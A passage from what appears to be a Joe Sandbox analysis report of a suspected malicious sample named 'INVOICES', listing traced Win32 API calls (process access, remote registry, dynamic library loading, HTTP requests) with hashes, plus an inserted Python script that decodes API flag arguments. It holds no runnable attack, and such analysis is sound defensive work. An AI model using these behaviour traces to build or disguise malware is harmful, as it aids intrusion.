                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 007A19FF
                                                                                                                                    • Part of subcall function 007A2599: GetLastError.KERNEL32(?,?,007A192D,00000000,00000000,00000001), ref: 007A25AE
                                                                                                                                    • Part of subcall function 007A2599: SetEvent.KERNEL32(?,?,007A192D,00000000,00000000,00000001), ref: 007A25C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                                                  • Opcode ID: a8b19039cf53b9df98d47bc01b419322e92ff1f74863bfe71bb0caa8e392d682
                                                                                                                                  • Instruction ID: d8afd0647858f8a85e36e27bd1c244e17f09c0746f9e5f95d67a2b65969775e3
                                                                                                                                  • Opcode Fuzzy Hash: a8b19039cf53b9df98d47bc01b419322e92ff1f74863bfe71bb0caa8e392d682
                                                                                                                                  • Instruction Fuzzy Hash: 3E21C2B2500208BFF7119F64DC99EBF77ACEB8AB44F50821AF40592140EB289E0597A5
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00731D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00731D73
                                                                                                                                    • Part of subcall function 00731D35: GetStockObject.GDI32(00000011), ref: 00731D87
                                                                                                                                    • Part of subcall function 00731D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00731D91
                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007B6493
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 007B649A
                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007B64AF
                                                                                                                                  • DestroyWindow.USER32(?), ref: 007B64B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                  • Opcode ID: 18c587c54d94da24a6c97a439ef639756804b8f5684ef7332fb378737b098db0
                                                                                                                                  • Instruction ID: 50041e9e890f96c4be2741ebc29d01a53e571058b5fb555e40610f8ea47bf4a6
                                                                                                                                  • Opcode Fuzzy Hash: 18c587c54d94da24a6c97a439ef639756804b8f5684ef7332fb378737b098db0
                                                                                                                                  • Instruction Fuzzy Hash: 1621B8B1200A45ABEF204FA4DC80FFA77A9EB49764F108629FB1492190C73DCD419760
                                                                                                                                  APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00796E65
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00796E98
• GetStdHandle.KERNEL32(0000000C), ref: 00796EAA
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00796EE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: a680ad9688dcdd61b65eb95cc659f1226a839d7190e7b3cc717013cb4eab795d
• Instruction ID: 5b786ef81957bc10577c33544682a79c9d8b1a372c6c2f27038fe195d91f811f
• Opcode Fuzzy Hash: a680ad9688dcdd61b65eb95cc659f1226a839d7190e7b3cc717013cb4eab795d
• Instruction Fuzzy Hash: C3218378600205ABDF209F39EC05A9A7BF4BF44720F208B29FCA0D72D0DB789850CB54
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00796F32
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00796F64
• GetStdHandle.KERNEL32(000000F6), ref: 00796F75
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00796FAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: f7d7870fa1a64a52b364afa8ff18a625114d3a5524fb890db674e6ec8391a9bf
• Instruction ID: 8a54a763894f1ee1d5b60697617e8fbb626da62a901f12d3baf37050e650e9c2
• Opcode Fuzzy Hash: f7d7870fa1a64a52b364afa8ff18a625114d3a5524fb890db674e6ec8391a9bf
• Instruction Fuzzy Hash: 5321AF71600305ABDF209F69BC08E9A77E9AF45720F204B59FDA1E72D0D77898508B60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0079ACDE
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0079AD32
• __swprintf.LIBCMT ref: 0079AD4B
• SetErrorMode.KERNEL32(00000000,00000001,00000000,007BF910), ref: 0079AD89
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 45a1f9586e5c2632f28792fc2574dd22f01363a6c373454badbb373521a1f47f
• Instruction ID: 4d7eaa03239742ecff4c28ed9d954f6224a3da8ac52a12586354f4eb191cfc97
• Opcode Fuzzy Hash: 45a1f9586e5c2632f28792fc2574dd22f01363a6c373454badbb373521a1f47f
• Instruction Fuzzy Hash: 08214474600109EFDB10DF59DD89EEE77B8EF49704B008069F509EB252DB75EA41CB61
APIs
  • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
  • Part of subcall function 0078A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0078A179
  • Part of subcall function 0078A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0078A18C
  • Part of subcall function 0078A15C: GetCurrentThreadId.KERNEL32 ref: 0078A193
  • Part of subcall function 0078A15C: AttachThreadInput.USER32(00000000), ref: 0078A19A
• GetFocus.USER32 ref: 0078A334
  • Part of subcall function 0078A1A5: GetParent.USER32(?), ref: 0078A1B3
• GetClassNameW.USER32(?,?,00000100), ref: 0078A37D
• EnumChildWindows.USER32(?,0078A3F5), ref: 0078A3A5
• __swprintf.LIBCMT ref: 0078A3BF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
• String ID: %s%d
• API String ID: 1941087503-1110647743
• Opcode ID: 40c000e8686853ec00271661ade05a25d2e334dd098434458bcea4a15b197135
• Instruction ID: 4ffdcadd67e9a1eb4f7e58e036fc6ecbd8cabfed93a16d8ea568cd7378ee5dfa
• Opcode Fuzzy Hash: 40c000e8686853ec00271661ade05a25d2e334dd098434458bcea4a15b197135
• Instruction Fuzzy Hash: AE11B1B1640209BBEF11BF64DC8AFEA37B8AF48700F004076FE08AA152CA795955CB71
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007AED1B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 007AED4B
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007AEE7E
• CloseHandle.KERNEL32(?), ref: 007AEEFF
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: cbe8fe7973905e13ae8fc0ff34b279f1f6decca29e55b5cb2bf04f8382bd507c
• Instruction ID: b1f3e7fc78f481ba09b687c563dba2de2cdedebbbb2e12bef57864ce523f7732
• Opcode Fuzzy Hash: cbe8fe7973905e13ae8fc0ff34b279f1f6decca29e55b5cb2bf04f8382bd507c
• Instruction Fuzzy Hash: 108131716043119FE720DF28C84AF6AB7E5AF88B10F14891DF695DB292D6B8AD40CB51
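The numeric arguments in the API lines of these records are raw hex, and they are what tells an analyst what each function actually does: CreateFileW("nul", 40000000, 00000002, ...) is GENERIC_WRITE with FILE_SHARE_WRITE and OPEN_EXISTING, the 80000000/00000001 variant is the read side, OpenProcess(00000410) is PROCESS_QUERY_INFORMATION|PROCESS_VM_READ (the rights GetProcessMemoryInfo and GetProcessIoCounters require), SetErrorMode(00000001) is SEM_FAILCRITICALERRORS and SendMessageTimeoutW(..., 00000002, 00001388, ...) is SMTO_ABORTIFHUNG with a 5000 ms timeout. The Python decoder below is an added illustration, not part of the Joe Sandbox report or of the AutoIt runtime whose functions it lists. It parses lines in the format used in these records (including the "Part of subcall function" prefix and argument-less calls) and names the flags only in argument positions whose meaning is fixed by the Win32 API; pointers, handles and heuristically recovered stack values stay raw. One caveat it makes explicit: the GetStdHandle arguments as recovered here (0000000C, 000000F6) do not match the documented STD_*_HANDLE values (0xFFFFFFF4 to 0xFFFFFFF6), so they are reported as unresolved rather than guessed. The sample lines embedded in the block are copied from the records above; the decoder and its tables are the added code.

```python
"""Decode the numeric arguments in Joe Sandbox API-call lines into Win32 flag names.

Added illustration for reading the function records in this report; it is not part of
the report. Only argument positions documented as flags or enumerations are decoded;
everything else (pointers, handles, heuristically recovered stack values) is left raw.
"""
import re

# Constructed sample: API lines copied from the function records in this report.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00796EE4",
    "• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00796FAF",
    "• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007AED1B",
    "• SetErrorMode.KERNEL32(00000001), ref: 0079ACDE",
    "  • Part of subcall function 0078A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0078A179",
    "  • Part of subcall function 0078A15C: GetCurrentThreadId.KERNEL32 ref: 0078A193",
    "• GetStdHandle.KERNEL32(000000F6), ref: 00796F32",
]

# Report-specific prefixes: the bullet and the optional "Part of subcall function XXXX:" tag.
PREFIX_RE = re.compile(r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?")
# "Api.MODULE(arg,arg), ref: ADDR" or, for argument-less calls, "Api.MODULE ref: ADDR".
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Bit-flag arguments keyed by (API name, zero-based argument index); values are the
# Windows SDK constants. Only parameters whose meaning is fixed by the API are listed.
BITMASKS = {
    ("CreateFileW", 1): [("GENERIC_READ", 0x80000000), ("GENERIC_WRITE", 0x40000000),
                         ("GENERIC_EXECUTE", 0x20000000), ("GENERIC_ALL", 0x10000000)],
    ("CreateFileW", 2): [("FILE_SHARE_READ", 0x1), ("FILE_SHARE_WRITE", 0x2), ("FILE_SHARE_DELETE", 0x4)],
    ("CreateFileW", 5): [("FILE_ATTRIBUTE_NORMAL", 0x80), ("FILE_FLAG_OVERLAPPED", 0x40000000)],
    ("OpenProcess", 0): [("PROCESS_TERMINATE", 0x1), ("PROCESS_CREATE_THREAD", 0x2),
                         ("PROCESS_VM_OPERATION", 0x8), ("PROCESS_VM_READ", 0x10),
                         ("PROCESS_VM_WRITE", 0x20), ("PROCESS_QUERY_INFORMATION", 0x400),
                         ("PROCESS_QUERY_LIMITED_INFORMATION", 0x1000)],
    ("SetErrorMode", 0): [("SEM_FAILCRITICALERRORS", 0x1), ("SEM_NOGPFAULTERRORBOX", 0x2),
                          ("SEM_NOALIGNMENTFAULTEXCEPT", 0x4), ("SEM_NOOPENFILEERRORBOX", 0x8000)],
    ("SendMessageTimeoutW", 4): [("SMTO_BLOCK", 0x1), ("SMTO_ABORTIFHUNG", 0x2),
                                 ("SMTO_NOTIMEOUTIFNOTHUNG", 0x8), ("SMTO_ERRORONEXIT", 0x20)],
}
# Enumerated (single-valued) arguments.
ENUMS = {
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    # STD_*_HANDLE are negative DWORDs; the report's recovered values (0xC, 0xF6) do not
    # match them, so those calls deliberately come out as "unresolved".
    ("GetStdHandle", 0): {0xFFFFFFF6: "STD_INPUT_HANDLE", 0xFFFFFFF5: "STD_OUTPUT_HANDLE",
                          0xFFFFFFF4: "STD_ERROR_HANDLE"},
}
# Plain integers whose unit is worth showing.
SCALARS = {("SendMessageTimeoutW", 5): "uTimeout={}ms"}


def parse_line(line):
    """Split one report line into (api, module, [raw args], ref); None if it is not a call."""
    m = CALL_RE.match(PREFIX_RE.sub("", line).strip())
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return m["api"], m["module"], args, m["ref"]


def decode_arg(api, idx, raw):
    """Name the flags in one argument, or return None to keep the raw text."""
    if raw == "?":
        return None  # the tracer could not recover this value
    try:
        value = int(raw, 16) & 0xFFFFFFFF  # "-00000001" becomes 0xFFFFFFFF
    except ValueError:
        return None  # a string literal such as "nul"
    key = (api, idx)
    if key in BITMASKS:
        names = [name for name, bit in BITMASKS[key] if value & bit]
        leftover = value & ~sum(bit for _, bit in BITMASKS[key])
        if leftover:
            names.append(f"0x{leftover:X}")  # bits we have no name for stay visible
        return "|".join(names) if names else "0"
    if key in ENUMS:
        return ENUMS[key].get(value, f"unresolved 0x{value:X}")
    if key in SCALARS:
        return SCALARS[key].format(value)
    return None


def render(line):
    """Rewrite a report line with its decodable arguments named."""
    parsed = parse_line(line)
    if parsed is None:
        return None
    api, _module, args, ref = parsed
    shown = [decode_arg(api, i, raw) or raw for i, raw in enumerate(args)]
    return f"{api}({', '.join(shown)}) @ {ref}"


if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(render(sample))
```

Run it as a script and it prints one decoded line per sample; feed it the API lines of a whole report to spot, for instance, every OpenProcess that asks for PROCESS_VM_WRITE or every CreateFileW that opens with CREATE_ALWAYS. Unknown bits in a mask are kept as hex rather than dropped, so a flag the table does not know cannot silently disappear.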
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
• Instruction ID: cf078ab5e30691bdce7c7583038f35f2ec73c596330b0c75de0a23a9a1fc3e2b
• Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
• Instruction Fuzzy Hash: 1D51C830A00B05DBDB248F69C8946EE77B2EF44332F244729FC25962D1D7F99D588B50
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 007B0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B0188
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007B01C7
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007B020E
• RegCloseKey.ADVAPI32(?,?), ref: 007B023A
• RegCloseKey.ADVAPI32(00000000), ref: 007B0247
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: 3bf0f58f0922b2d25e9fcbdf0e9093be6a7b360b0454d2477d55ea4c27b58722
• Instruction ID: f37011008252fc91327bafac982368e383a4ba6128941f1a759a84b338aa9f42
• Opcode Fuzzy Hash: 3bf0f58f0922b2d25e9fcbdf0e9093be6a7b360b0454d2477d55ea4c27b58722
• Instruction Fuzzy Hash: 6B511A71108204EFD714EB58DC85FAEB7E8BF84714F04891DF595871A2DB38E905CB52
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007ADA3B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 007ADABE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 007ADADA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 007ADB1B
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007ADB35
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0079793F,?,?,00000000), ref: 00735B8C
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0079793F,?,?,00000000,?,?), ref: 00735BB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327935632-0
                                                                                                                                  • Opcode ID: 178b73d9605ee86ba402c3fd99161942eba34294b3d0a203f7bf9ef58c30dfd2
                                                                                                                                  • Instruction ID: 91032ab9e959b8611d39f01961d6dbb0e04e764986efed66f3a16e21946a6b64
                                                                                                                                  • Opcode Fuzzy Hash: 178b73d9605ee86ba402c3fd99161942eba34294b3d0a203f7bf9ef58c30dfd2
                                                                                                                                  • Instruction Fuzzy Hash: F7512975A00209DFDB10EFA8C888DADB7F4FF49310B05C165E91AAB312DB38AD45CB90
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0079E6AB
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0079E6D4
                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0079E713
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0079E738
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0079E740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                  • Opcode ID: f5101bf22b58e9023c31f191c1515ffc3f98c8315137f1663b84b4f6d3bfd8c7
                                                                                                                                  • Instruction ID: 18b4e046bb9ea754bed5236154d1e2cc3bb6fdbd9ac563a1af7e3ad0dab5a1e4
                                                                                                                                  • Opcode Fuzzy Hash: f5101bf22b58e9023c31f191c1515ffc3f98c8315137f1663b84b4f6d3bfd8c7
                                                                                                                                  • Instruction Fuzzy Hash: 37513835A00205DFDF00EF64C985AADBBF5EF48314F1480A9E949AB362CB79ED11DB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
